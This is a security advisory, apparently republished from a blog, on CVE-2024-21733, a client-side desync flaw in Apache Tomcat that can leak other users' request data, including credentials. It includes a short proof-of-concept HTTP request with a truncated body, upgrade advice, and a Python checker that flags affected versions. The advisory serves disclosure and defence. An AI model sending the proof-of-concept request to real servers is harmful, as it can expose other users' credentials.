Description
Apache Tomcat® software is an open source implementation of the Jakarta Servlet, Jakarta Server Pages, Jakarta Expression Language, Jakarta WebSocket, Jakarta Annotations, and Jakarta Authentication specifications.
Apache Tomcat 8.5.7 through 8.5.63 and 9.0.0-M11 through 9.0.43 are vulnerable to client-side desynchronization (CSD) attacks: an incomplete POST request triggers an error response that can contain data from a previous request sent by another user (CVE-2024-21733).
Impact
The client-side desynchronization (CSD) condition arises because the server does not correctly handle a POST request whose body is shorter than the length announced in its Content-Length header. Using this flaw, an attacker can make a victim's browser issue such a request and desynchronize the browser's connection to the site, and the error response the server then produces can disclose sensitive data belonging to other server and client connections.
The severity of the impact varies depending on the application using Tomcat as the back-end web server, potentially exposing confidential information such as plaintext credentials. For example, our team found an instance in a version of ManageEngine's ADSelfService Plus portal prior to version 6304 where it was possible to surreptitiously obtain plaintext Active Directory credentials from client connections, as shown below.
PoC / Exploit
POST / HTTP/1.1
Host: hostname
Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
X
Mitigation
Users of affected versions should apply one of the following mitigations:
Upgrade to Apache Tomcat 9.0.44 or later
Upgrade to Apache Tomcat 8.5.64 or later
Credit: xer0dayz of Sn1perSecurity LLC responsibly reported this vulnerability to the Tomcat security team.
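To decide quickly whether a deployment falls inside the affected ranges, the following added example (editor's code, not from the Apache advisory) parses a Tomcat version string, including 9.0.0-Mxx milestone builds, orders it against the ranges quoted on this page, reports the first fixed release on the same branch, and extracts the version from the "Apache Tomcat/x.y.z" banner that the default ErrorReportValve page prints unless showServerInfo is disabled. The version regex, the milestone ordering rule and the banner extraction are the example's own assumptions.

```python
"""Classify a Tomcat version against the CVE-2024-21733 affected ranges.

Added example (editor's code, not from the Apache advisory); the ranges and
fixed versions are the ones quoted on this page. The version regex, the
milestone ordering rule and the banner extraction are the example's own
assumptions.
"""
import re
from typing import Optional, Tuple

# x.y.z or x.y.z-Mnn (milestone builds such as 9.0.0-M11)
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-M(\d+))?$")
# Default error pages print "Apache Tomcat/x.y.z" unless showServerInfo is off
_BANNER_RE = re.compile(r"Apache Tomcat/(\d+\.\d+\.\d+(?:-M\d+)?)")
_FINAL = 10**6  # rank for a final release: sorts after every milestone of the same x.y.z

AFFECTED_RANGES = [("8.5.7", "8.5.63"), ("9.0.0-M11", "9.0.43")]
FIXED_IN = {8: "8.5.64", 9: "9.0.44"}


def version_key(version: str) -> Tuple[int, int, int, int]:
    """Turn '9.0.0-M11' into (9, 0, 0, 11) and '9.0.43' into (9, 0, 43, _FINAL)."""
    match = _VERSION_RE.match(version.strip())
    if not match:
        raise ValueError(f"unrecognised Tomcat version: {version!r}")
    major, minor, patch, milestone = match.groups()
    rank = int(milestone) if milestone is not None else _FINAL
    return int(major), int(minor), int(patch), rank


def is_affected(version: str) -> bool:
    """True when the version falls inside one of the advisory's ranges (inclusive)."""
    key = version_key(version)
    return any(version_key(low) <= key <= version_key(high) for low, high in AFFECTED_RANGES)


def recommended_upgrade(version: str) -> Optional[str]:
    """The first fixed release on the same branch, or None if not affected."""
    if not is_affected(version):
        return None
    return FIXED_IN[version_key(version)[0]]


def version_from_banner(text: str) -> Optional[str]:
    """Pull the version out of an error page or header that carries the Tomcat banner."""
    match = _BANNER_RE.search(text)
    return match.group(1) if match else None


if __name__ == "__main__":
    # Constructed error-page fragment, not captured from a real server
    sample_page = '<hr class="line" /><h3>Apache Tomcat/9.0.43</h3></body></html>'
    found = version_from_banner(sample_page)
    print(found, is_affected(found), recommended_upgrade(found))
```

The milestone rank makes 9.0.0-M10 sort below 9.0.0-M11 and every milestone sort below the final 9.0.0, which is what the inclusive lower bound on the 9.0 branch requires. Versions on other branches (for example 10.1.x) are reported as not affected because the advisory lists only the 8.5 and 9.0 ranges.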
History: 2024-01-19 Original Bulletin
Full Security Bulletin: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz
References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21733
https://tomcat.apache.org/security-9.html
https://tomcat.apache.org/security-8.html
https://portswigger.net/research/browser-powered-desync-attacks
https://hackerone.com/reports/2327341
Original article by Chief Security Officer; if reproduced, please credit https://cncso.com/en/cve-2024-21733-apache-tomcat-http-request-smuggling-html